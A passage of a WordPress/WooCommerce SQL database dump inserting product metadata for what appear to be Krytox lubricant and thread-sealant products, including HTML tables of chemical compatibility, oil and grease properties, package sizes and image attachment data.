Peroxide</td>\r\n<td style="text-align: center;">Polyol Ester Oils</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;">Butadiene</td>\r\n<td style="text-align: center;">Hydrogen Sulfide</td>\r\n<td style="text-align: center;">Polyphenyleneoxide</td>\r\n</tr>\r\n<tr>\r\n<td></td>\r\n<td style="text-align: center;">Butane</td>\r\n<td style="text-align: center;">Iodine</td>\r\n<td style="text-align: center;">(PPO)</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;">Butylene</td>\r\n<td style="text-align: center;">Isopropyl Alcohol</td>\r\n<td style="text-align: center;">Potassium Hydroxide</td>\r\n</tr>\r\n<tr>\r\n<td></td>\r\n<td style="text-align: center;">Carbon Dioxide</td>\r\n<td style="text-align: center;">JP 4 and 8 Turbine Fuel</td>\r\n<td style="text-align: center;">Potassium</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;">Carbon Monoxide</td>\r\n<td style="text-align: center;">Lithium Glycol</td>\r\n<td style="text-align: center;">Permanganate</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;">Carbon Tetrachloride</td>\r\n<td style="text-align: center;">Methane</td>\r\n<td style="text-align: center;">Propane</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;">Chlorine, Liquid or Gas</td>\r\n<td style="text-align: center;">Methanol</td>\r\n<td style="text-align: center;">Propylene</td>\r\n</tr>\r\n<tr>\r\n<td></td>\r\n<td style="text-align: center;">Chlorine Trifluoride</td>\r\n<td style="text-align: center;">Methylamine</td>\r\n<td style="text-align: center;">Red Fuming Nitric Acid</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;">Chloroform</td>\r\n<td style="text-align: center;">Methylchloride</td>\r\n<td style="text-align: center;">Silicone Products</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;">Compressed Air</td>\r\n<td style="text-align: center;">Methylbromide</td>\r\n<td style="text-align: center;">Sodium Hydroxide</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;">Dichlorosilane</td>\r\n<td style="text-align: center;">Methylmercaptan</td>\r\n<td style="text-align: center;">Sulfur Hexafluoride</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;">Dimethylether</td>\r\n<td style="text-align: center;">Methylsilane</td>\r\n<td style="text-align: center;">Sulfuric Acid</td>\r\n</tr>\r\n<tr>\r\n<td></td>\r\n<td style="text-align: center;">Diesel Fuel</td>\r\n<td style="text-align: center;">Methylene Oxide</td>\r\n<td style="text-align: center;">Sulfur Oxides</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;">Diethylenetriamine</td>\r\n<td style="text-align: center;">Mineral Acids</td>\r\n<td style="text-align: center;">Unsymmetrical Dimethyl</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;">Ester Oils</td>\r\n<td style="text-align: center;">Monosilane</td>\r\n<td style="text-align: center;">Hydrazine</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;">Ethane</td>\r\n<td style="text-align: center;">Molten Caustic</td>\r\n<td style="text-align: center;">Uranium Hexafluoride</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;">Ethanol</td>\r\n<td style="text-align: center;">Natural Gas</td>\r\n<td style="text-align: center;">Trifluoroacetylchloride</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;">Ethyl Alcohol</td>\r\n<td style="text-align: center;">Nitric Acid</td>\r\n<td style="text-align: center;">Trimethylamine</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;">Ethyl Chloride</td>\r\n<td style="text-align: center;">Nitrogen</td>\r\n<td style="text-align: center;">Vinyl Chloride</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;">Ethylene</td>\r\n<td style="text-align: center;">Nitrogen Oxide</td>\r\n<td style="text-align: center;">Vinyl Bromide</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;">Ethylene Glycol</td>\r\n<td style="text-align: center;">Nitrogen Oxides</td>\r\n<td style="text-align: center;">Vinyl Fluoride</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;">Ethylene Oxide</td>\r\n<td style="text-align: center;">Nitrogen Trifluoride</td>\r\n<td style="text-align: center;">Water, Steam</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;">Fluorine</td>\r\n<td style="text-align: center;">Nitrotrifluorine</td>\r\n<td style="text-align: center;">And more…</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;">Formaldehyde</td>\r\n<td style="text-align: center;">Nitrous Oxide</td>\r\n<td></td>\r\n</tr>\r\n<tr>\r\n<td></td>\r\n<td style="text-align: center;">Gasoline</td>\r\n<td style="text-align: center;">(Anesthesia)</td>\r\n<td></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;">Helium</td>\r\n<td style="text-align: center;">Organic Acids</td>\r\n<td style="text-align: center;"></td>\r\n</tr>\r\n</tbody>\r\n</table>'); 
INSERT INTO `wp_postmeta` VALUES (10357, 989, '716_default_editor', '<ul>\r\n 	<li>Fitting Threads</li>\r\n 	<li>Pipes</li>\r\n 	<li>Fittings</li>\r\n 	<li>High Corrosion environments</li>\r\n</ul>'); 
INSERT INTO `wp_postmeta` VALUES (10358, 989, '719_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (10359, 989, '317_default_editor', '<table>\r\n<tbody>\r\n<tr>\r\n<td width="125">\r\n<p style="text-align: center;"><strong>Syringe</strong></p>\r\n</td>\r\n<td style="text-align: center;" width="125"><strong>Tube</strong></td>\r\n<td style="text-align: center;" width="125"><strong>Jar</strong></td>\r\n<td style="text-align: center;" width="125"><strong>Cartridge</strong></td>\r\n<td width="125">\r\n<p style="text-align: center;"><strong>Pail</strong></p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td width="125">\r\n<p style="text-align: center;">0.5 oz.</p>\r\n</td>\r\n<td style="text-align: center;" width="125">2 oz.</td>\r\n<td style="text-align: center;" width="125">0.5 kg</td>\r\n<td style="text-align: center;" width="125">0.8 kg</td>\r\n<td width="125">\r\n<p style="text-align: center;">5 kg</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td width="125">\r\n<p style="text-align: center;">1 oz.</p>\r\n</td>\r\n<td style="text-align: center;" width="125">-</td>\r\n<td style="text-align: center;" width="125">1 kg</td>\r\n<td style="text-align: center;" width="125"></td>\r\n<td style="text-align: center;" width="125">7 kg</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" width="125">2 oz.</td>\r\n<td style="text-align: center;" width="125">8 oz.</td>\r\n<td style="text-align: center;" width="125"></td>\r\n<td style="text-align: center;" width="125"></td>\r\n<td width="125">\r\n<p style="text-align: center;">20 kg</p>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>'); 
INSERT INTO `wp_postmeta` VALUES (10360, 989, 'wc_productdata_options', 'a:1:{i:0;a:6:{s:11:"_bubble_new";s:0:"";s:12:"_bubble_text";s:0:"";s:17:"_custom_tab_title";s:0:"";s:11:"_custom_tab";s:0:"";s:14:"_product_video";s:0:"";s:19:"_product_video_size";s:0:"";}}'); 
INSERT INTO `wp_postmeta` VALUES (10361, 989, 'total_sales', '0'); 
INSERT INTO `wp_postmeta` VALUES (10362, 989, '_downloadable', 'no'); 
INSERT INTO `wp_postmeta` VALUES (10363, 989, '_virtual', 'no'); 
INSERT INTO `wp_postmeta` VALUES (10364, 989, '_purchase_note', ''); 
INSERT INTO `wp_postmeta` VALUES (10365, 989, '_featured', 'no'); 
INSERT INTO `wp_postmeta` VALUES (10366, 989, '_weight', ''); 
INSERT INTO `wp_postmeta` VALUES (10367, 989, '_length', ''); 
INSERT INTO `wp_postmeta` VALUES (10368, 989, '_width', ''); 
INSERT INTO `wp_postmeta` VALUES (10369, 989, '_height', ''); 
INSERT INTO `wp_postmeta` VALUES (10370, 989, '_sku', ''); 
INSERT INTO `wp_postmeta` VALUES (10371, 989, '_product_attributes', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (10372, 989, '_regular_price', ''); 
INSERT INTO `wp_postmeta` VALUES (10373, 989, '_sale_price', ''); 
INSERT INTO `wp_postmeta` VALUES (10374, 989, '_sale_price_dates_from', ''); 
INSERT INTO `wp_postmeta` VALUES (10375, 989, '_sale_price_dates_to', ''); 
INSERT INTO `wp_postmeta` VALUES (10376, 989, '_price', ''); 
INSERT INTO `wp_postmeta` VALUES (10377, 989, '_sold_individually', ''); 
INSERT INTO `wp_postmeta` VALUES (10378, 989, '_manage_stock', 'no'); 
INSERT INTO `wp_postmeta` VALUES (10379, 989, '_backorders', 'no'); 
INSERT INTO `wp_postmeta` VALUES (10380, 989, '_stock', ''); 
INSERT INTO `wp_postmeta` VALUES (10381, 989, '_upsell_ids', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (10382, 989, '_crosssell_ids', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (10383, 989, '_product_version', '2.6.11'); 
INSERT INTO `wp_postmeta` VALUES (10384, 989, '_ywtm_hide_reviews', 'no'); 
INSERT INTO `wp_postmeta` VALUES (10385, 989, '_ywtm_override_reviews', 'no'); 
INSERT INTO `wp_postmeta` VALUES (10386, 989, '_ywtm_priority_tab_reviews', '30'); 
INSERT INTO `wp_postmeta` VALUES (10387, 989, '_ywtm_title_tab_reviews', 'Reviews (%d)'); 
INSERT INTO `wp_postmeta` VALUES (10388, 989, '_product_image_gallery', '380,377,375,381'); 
INSERT INTO `wp_postmeta` VALUES (10389, 989, '_wc_review_count', '0'); 
INSERT INTO `wp_postmeta` VALUES (10390, 990, '_wp_attached_file', '2016/08/krytox-ts4-thread-sealant.jpg'); 
INSERT INTO `wp_postmeta` VALUES (10391, 990, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:3504;s:6:"height";i:2336;s:4:"file";s:37:"2016/08/krytox-ts4-thread-sealant.jpg";s:5:"sizes";a:8:{s:9:"thumbnail";a:4:{s:4:"file";s:37:"krytox-ts4-thread-sealant-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:37:"krytox-ts4-thread-sealant-800x533.jpg";s:5:"width";i:800;s:6:"height";i:533;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:37:"krytox-ts4-thread-sealant-768x512.jpg";s:5:"width";i:768;s:6:"height";i:512;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:39:"krytox-ts4-thread-sealant-1600x1067.jpg";s:5:"width";i:1600;s:6:"height";i:1067;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:37:"krytox-ts4-thread-sealant-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:37:"krytox-ts4-thread-sealant-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:37:"krytox-ts4-thread-sealant-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:37:"krytox-ts4-thread-sealant-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"5";s:8:"quantity";d:67;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (10392, 989, '_thumbnail_id', '1967'); 
INSERT INTO `wp_postmeta` VALUES (10393, 991, '_wp_attached_file', '2016/08/krytox-fsh-oil.jpg'); 
INSERT INTO `wp_postmeta` VALUES (10394, 991, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:6500;s:6:"height";i:4338;s:4:"file";s:26:"2016/08/krytox-fsh-oil.jpg";s:5:"sizes";a:8:{s:9:"thumbnail";a:4:{s:4:"file";s:26:"krytox-fsh-oil-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:26:"krytox-fsh-oil-800x534.jpg";s:5:"width";i:800;s:6:"height";i:534;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:26:"krytox-fsh-oil-768x513.jpg";s:5:"width";i:768;s:6:"height";i:513;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:28:"krytox-fsh-oil-1600x1068.jpg";s:5:"width";i:1600;s:6:"height";i:1068;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:26:"krytox-fsh-oil-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:26:"krytox-fsh-oil-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:26:"krytox-fsh-oil-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:26:"krytox-fsh-oil-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"1";s:8:"quantity";d:78;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (10395, 956, '_thumbnail_id', '384'); 
INSERT INTO `wp_postmeta` VALUES (10396, 960, '_wc_review_count', '0'); 
INSERT INTO `wp_postmeta` VALUES (10397, 992, '_edit_lock', '1474297342:2'); 
INSERT INTO `wp_postmeta` VALUES (10398, 992, '_edit_last', '2'); 
INSERT INTO `wp_postmeta` VALUES (10399, 992, '_visibility', 'visible'); 
INSERT INTO `wp_postmeta` VALUES (10400, 992, '_stock_status', 'instock'); 
INSERT INTO `wp_postmeta` VALUES (10401, 992, '312_default_editor', '<table width="1573">\r\n<tbody>\r\n<tr>\r\n<td style="text-align: center;" colspan="9" width="1573"><strong>XP Properties</strong></td>\r\n</tr>\r\n<tr>\r\n<td><strong>Oil</strong></td>\r\n<td style="text-align: center;"><strong>XP 1A0</strong></td>\r\n<td style="text-align: center;"><strong>XP 1A1</strong></td>\r\n<td style="text-align: center;"><strong>XP 1A2</strong></td>\r\n<td style="text-align: center;"><strong>XP 1A3</strong></td>\r\n<td style="text-align: center;"><strong>XP 1A4</strong></td>\r\n<td style="text-align: center;"><strong>XP 1A5</strong></td>\r\n<td style="text-align: center;"><strong>XP 1A6</strong></td>\r\n<td style="text-align: center;"><strong>XP 1A7</strong></td>\r\n</tr>\r\n<tr>\r\n<td><strong>Grease</strong></td>\r\n<td style="text-align: center;"><strong>XP 2A0</strong></td>\r\n<td style="text-align: center;"><strong>XP 2A1</strong></td>\r\n<td style="text-align: center;"><strong>XP 2A2</strong></td>\r\n<td style="text-align: center;"><strong>XP 2A3</strong></td>\r\n<td style="text-align: center;"><strong>XP 2A4</strong></td>\r\n<td style="text-align: center;"><strong>XP 2A5</strong></td>\r\n<td style="text-align: center;"><strong>XP 2A6</strong></td>\r\n<td style="text-align: center;"><strong>XP 2A7</strong></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: left;"><strong>ISO Grade of Base Oil</strong></td>\r\n<td style="text-align: center;">5</td>\r\n<td style="text-align: center;">7</td>\r\n<td style="text-align: center;">15</td>\r\n<td style="text-align: center;">32</td>\r\n<td style="text-align: center;">68</td>\r\n<td style="text-align: center;">150</td>\r\n<td style="text-align: center;">220</td>\r\n<td style="text-align: center;">460</td>\r\n</tr>\r\n<tr>\r\n<td><strong>Temperature Range °C</strong></td>\r\n<td style="text-align: center;">-70-66</td>\r\n<td style="text-align: center;">-70-104</td>\r\n<td style="text-align: center;">63-132</td>\r\n<td style="text-align: center;">60-154</td>\r\n<td style="text-align: center;">-51-179</td>\r\n<td style="text-align: center;">-36-182</td>\r\n<td style="text-align: center;">-36-182</td>\r\n<td style="text-align: center;">-30-182</td>\r\n</tr>\r\n<tr>\r\n<td><strong>Oil Viscosity, cSt</strong></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n</tr>\r\n<tr>\r\n<td>20°C</td>\r\n<td style="text-align: center;">7</td>\r\n<td style="text-align: center;">16</td>\r\n<td style="text-align: center;">36</td>\r\n<td style="text-align: center;">80</td>\r\n<td style="text-align: center;">180</td>\r\n<td style="text-align: center;">550</td>\r\n<td style="text-align: center;">810</td>\r\n<td style="text-align: center;">1600</td>\r\n</tr>\r\n<tr>\r\n<td>40°C</td>\r\n<td style="text-align: center;">4</td>\r\n<td style="text-align: center;">8</td>\r\n<td style="text-align: center;">15</td>\r\n<td style="text-align: center;">30</td>\r\n<td style="text-align: center;">60</td>\r\n<td style="text-align: center;">160</td>\r\n<td style="text-align: center;">240</td>\r\n<td style="text-align: center;">440</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: left;">100°C</td>\r\n<td style="text-align: center;">-</td>\r\n<td style="text-align: center;">2</td>\r\n<td style="text-align: center;">3</td>\r\n<td style="text-align: center;">5</td>\r\n<td style="text-align: center;">9</td>\r\n<td style="text-align: center;">18</td>\r\n<td style="text-align: center;">25</td>\r\n<td style="text-align: center;">42</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: left;"><strong>Oil Viscosity Index</strong></td>\r\n<td style="text-align: center;">-</td>\r\n<td style="text-align: center;">-</td>\r\n<td style="text-align: center;">59</td>\r\n<td style="text-align: center;">121</td>\r\n<td style="text-align: center;">124</td>\r\n<td style="text-align: center;">134</td>\r\n<td style="text-align: center;">134</td>\r\n<td style="text-align: center;">155</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: left;"><strong>Food Contact Approval</strong></td>\r\n<td style="text-align: center;">None</td>\r\n<td style="text-align: center;">None</td>\r\n<td style="text-align: center;">None</td>\r\n<td style="text-align: center;">None</td>\r\n<td style="text-align: center;">None</td>\r\n<td style="text-align: center;">XP 1A5 Only</td>\r\n<td style="text-align: center;">None</td>\r\n<td style="text-align: center;">None</td>\r\n</tr>\r\n</tbody>\r\n</table>'); 
INSERT INTO `wp_postmeta` VALUES (10402, 992, '716_default_editor', '<ul>\r\n 	<li>Bearings</li>\r\n</ul>'); 
INSERT INTO `wp_postmeta` VALUES (10403, 992, '719_default_editor', '<ul>\r\n 	<li>ASTM D2266</li>\r\n 	<li>ASTM D2783</li>\r\n 	<li>ASTM D2596</li>\r\n 	<li>ASTM D1743</li>\r\n 	<li>ASTM B117</li>\r\n 	<li>ASTM D3233</li>\r\n 	<li>EMCOR</li>\r\n</ul>'); 
INSERT INTO `wp_postmeta` VALUES (10404, 992, '317_default_editor', '<table>\r\n<tbody>\r\n<tr>\r\n<td style="text-align: center;" width="104"><strong>Syringe</strong></td>\r\n<td style="text-align: center;" width="104"><strong>Dab-O-Matic</strong></td>\r\n<td style="text-align: center;" width="104"><strong>Needle Nose Bottle</strong></td>\r\n<td style="text-align: center;" width="104"><strong>Jar</strong></td>\r\n<td style="text-align: center;" width="104"><strong>Bottle</strong></td>\r\n<td width="104">\r\n<p style="text-align: center;"><strong>Jug</strong></p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td width="104">\r\n<p style="text-align: center;">.5 oz.</p>\r\n</td>\r\n<td style="text-align: center;" width="104">1 oz.</td>\r\n<td style="text-align: center;" width="104">1 oz.</td>\r\n<td style="text-align: center;" width="104">.5 kg</td>\r\n<td style="text-align: center;" width="104">1 kg</td>\r\n<td style="text-align: center;" width="104">5 kg</td>\r\n</tr>\r\n<tr>\r\n<td width="104">\r\n<p style="text-align: center;">1 oz.</p>\r\n</td>\r\n<td style="text-align: center;" width="104">2 oz.</td>\r\n<td style="text-align: center;" width="104">2 oz.</td>\r\n<td style="text-align: center;" width="104"></td>\r\n<td style="text-align: center;" width="104"></td>\r\n<td width="104">\r\n<p style="text-align: center;">20 kg</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td width="104">\r\n<p style="text-align: center;">2 oz.</p>\r\n</td>\r\n<td style="text-align: center;" width="104">-</td>\r\n<td width="104">\r\n<p style="text-align: center;">-</p>\r\n</td>\r\n<td width="104"></td>\r\n<td width="104"></td>\r\n<td width="104"></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" width="104">-</td>\r\n<td style="text-align: center;" width="104"></td>\r\n<td style="text-align: center;" width="104"></td>\r\n<td style="text-align: center;" width="104"></td>\r\n<td width="104"></td>\r\n<td width="104"></td>\r\n</tr>\r\n</tbody>\r\n</table>'); 
INSERT INTO `wp_postmeta` VALUES (10405, 992, 'wc_productdata_options', 'a:1:{i:0;a:6:{s:11:"_bubble_new";s:0:"";s:12:"_bubble_text";s:0:"";s:17:"_custom_tab_title";s:0:"";s:11:"_custom_tab";s:0:"";s:14:"_product_video";s:0:"";s:19:"_product_video_size";s:0:"";}}'); 
INSERT INTO `wp_postmeta` VALUES (10406, 992, 'total_sales', '0'); 
INSERT INTO `wp_postmeta` VALUES (10407, 992, '_downloadable', 'no'); 
INSERT INTO `wp_postmeta` VALUES (10408, 992, '_virtual', 'no'); 
INSERT INTO `wp_postmeta` VALUES (10409, 992, '_purchase_note', ''); 
INSERT INTO `wp_postmeta` VALUES (10410, 992, '_featured', 'no'); 
INSERT INTO `wp_postmeta` VALUES (10411, 992, '_weight', ''); 
INSERT INTO `wp_postmeta` VALUES (10412, 992, '_length', ''); 
INSERT INTO `wp_postmeta` VALUES (10413, 992, '_width', ''); 
INSERT INTO `wp_postmeta` VALUES (10414, 992, '_height', ''); 
INSERT INTO `wp_postmeta` VALUES (10415, 992, '_sku', ''); 
INSERT INTO `wp_postmeta` VALUES (10416, 992, '_product_attributes', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (10417, 992, '_regular_price', ''); 
INSERT INTO `wp_postmeta` VALUES (10418, 992, '_sale_price', ''); 
INSERT INTO `wp_postmeta` VALUES (10419, 992, '_sale_price_dates_from', ''); 
INSERT INTO `wp_postmeta` VALUES (10420, 992, '_sale_price_dates_to', ''); 
INSERT INTO `wp_postmeta` VALUES (10421, 992, '_price', ''); 
INSERT INTO `wp_postmeta` VALUES (10422, 992, '_sold_individually', ''); 
INSERT INTO `wp_postmeta` VALUES (10423, 992, '_manage_stock', 'no'); 
INSERT INTO `wp_postmeta` VALUES (10424, 992, '_backorders', 'no'); 
INSERT INTO `wp_postmeta` VALUES (10425, 992, '_stock', ''); 
INSERT INTO `wp_postmeta` VALUES (10426, 992, '_upsell_ids', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (10427, 992, '_crosssell_ids', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (10428, 992, '_product_version', '2.6.4'); 
INSERT INTO `wp_postmeta` VALUES (10429, 992, '_ywtm_hide_reviews', 'no'); 
INSERT INTO `wp_postmeta` VALUES (10430, 992, '_ywtm_override_reviews', 'no'); 
INSERT INTO `wp_postmeta` VALUES (10431, 992, '_ywtm_priority_tab_reviews', '30'); 
INSERT INTO `wp_postmeta` VALUES (10432, 992, '_ywtm_title_tab_reviews', 'Reviews (%d)'); 
INSERT INTO `wp_postmeta` VALUES (10433, 992, '_product_image_gallery', '385,386,387,388'); 
INSERT INTO `wp_postmeta` VALUES (10434, 992, '_wc_review_count', '0'); 
INSERT INTO `wp_postmeta` VALUES (10435, 993, '_edit_lock', '1474297395:2'); 
INSERT INTO `wp_postmeta` VALUES (10436, 993, '_edit_last', '2'); 
INSERT INTO `wp_postmeta` VALUES (10437, 993, '_visibility', 'visible'); 
INSERT INTO `wp_postmeta` VALUES (10438, 993, '_stock_status', 'instock'); 
INSERT INTO `wp_postmeta` VALUES (10439, 993, '312_default_editor', '<table width="1573">\r\n<tbody>\r\n<tr>\r\n<td style="text-align: center;" colspan="9" width="1573"><strong>XP Properties</strong></td>\r\n</tr>\r\n<tr>\r\n<td><strong>Oil</strong></td>\r\n<td style="text-align: center;"><strong>XP 1A0</strong></td>\r\n<td style="text-align: center;"><strong>XP 1A1</strong></td>\r\n<td style="text-align: center;"><strong>XP 1A2</strong></td>\r\n<td style="text-align: center;"><strong>XP 1A3</strong></td>\r\n<td style="text-align: center;"><strong>XP 1A4</strong></td>\r\n<td style="text-align: center;"><strong>XP 1A5</strong></td>\r\n<td style="text-align: center;"><strong>XP 1A6</strong></td>\r\n<td style="text-align: center;"><strong>XP 1A7</strong></td>\r\n</tr>\r\n<tr>\r\n<td><strong>Grease</strong></td>\r\n<td style="text-align: center;"><strong>XP 2A0</strong></td>\r\n<td style="text-align: center;"><strong>XP 2A1</strong></td>\r\n<td style="text-align: center;"><strong>XP 2A2</strong></td>\r\n<td style="text-align: center;"><strong>XP 2A3</strong></td>\r\n<td style="text-align: center;"><strong>XP 2A4</strong></td>\r\n<td style="text-align: center;"><strong>XP 2A5</strong></td>\r\n<td style="text-align: center;"><strong>XP 2A6</strong></td>\r\n<td style="text-align: center;"><strong>XP 2A7</strong></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: left;"><strong>ISO Grade of Base Oil</strong></td>\r\n<td style="text-align: center;">5</td>\r\n<td style="text-align: center;">7</td>\r\n<td style="text-align: center;">15</td>\r\n<td style="text-align: center;">32</td>\r\n<td style="text-align: center;">68</td>\r\n<td style="text-align: center;">150</td>\r\n<td style="text-align: center;">220</td>\r\n<td style="text-align: center;">460</td>\r\n</tr>\r\n<tr>\r\n<td><strong>Temperature Range °C</strong></td>\r\n<td style="text-align: center;">-70-66</td>\r\n<td style="text-align: center;">-70-104</td>\r\n<td style="text-align: center;">63-132</td>\r\n<td style="text-align: center;">60-154</td>\r\n<td style="text-align: center;">-51-179</td>\r\n<td style="text-align: center;">-36-182</td>\r\n<td style="text-align: center;">-36-182</td>\r\n<td style="text-align: center;">-30-182</td>\r\n</tr>\r\n<tr>\r\n<td><strong>Oil Viscosity, cSt</strong></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n</tr>\r\n<tr>\r\n<td>20°C</td>\r\n<td style="text-align: center;">7</td>\r\n<td style="text-align: center;">16</td>\r\n<td style="text-align: center;">36</td>\r\n<td style="text-align: center;">80</td>\r\n<td style="text-align: center;">180</td>\r\n<td style="text-align: center;">550</td>\r\n<td style="text-align: center;">810</td>\r\n<td style="text-align: center;">1600</td>\r\n</tr>\r\n<tr>\r\n<td>40°C</td>\r\n<td style="text-align: center;">4</td>\r\n<td style="text-align: center;">8</td>\r\n<td style="text-align: center;">15</td>\r\n<td style="text-align: center;">30</td>\r\n<td style="text-align: center;">60</td>\r\n<td style="text-align: center;">160</td>\r\n<td style="text-align: center;">240</td>\r\n<td style="text-align: center;">440</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: left;">100°C</td>\r\n<td style="text-align: center;">-</td>\r\n<td style="text-align: center;">2</td>\r\n<td style="text-align: center;">3</td>\r\n<td style="text-align: center;">5</td>\r\n<td style="text-align: center;">9</td>\r\n<td style="text-align: center;">18</td>\r\n<td style="text-align: center;">25</td>\r\n<td style="text-align: center;">42</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: left;"><strong>Oil Viscosity Index</strong></td>\r\n<td style="text-align: center;">-</td>\r\n<td style="text-align: center;">-</td>\r\n<td style="text-align: center;">59</td>\r\n<td style="text-align: center;">121</td>\r\n<td style="text-align: center;">124</td>\r\n<td style="text-align: center;">134</td>\r\n<td style="text-align: center;">134</td>\r\n<td style="text-align: center;">155</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: left;"><strong>Food Contact Approval</strong></td>\r\n<td style="text-align: center;">None</td>\r\n<td style="text-align: center;">None</td>\r\n<td style="text-align: center;">None</td>\r\n<td style="text-align: center;">None</td>\r\n<td style="text-align: center;">None</td>\r\n<td style="text-align: center;">XP 1A5 Only</td>\r\n<td style="text-align: 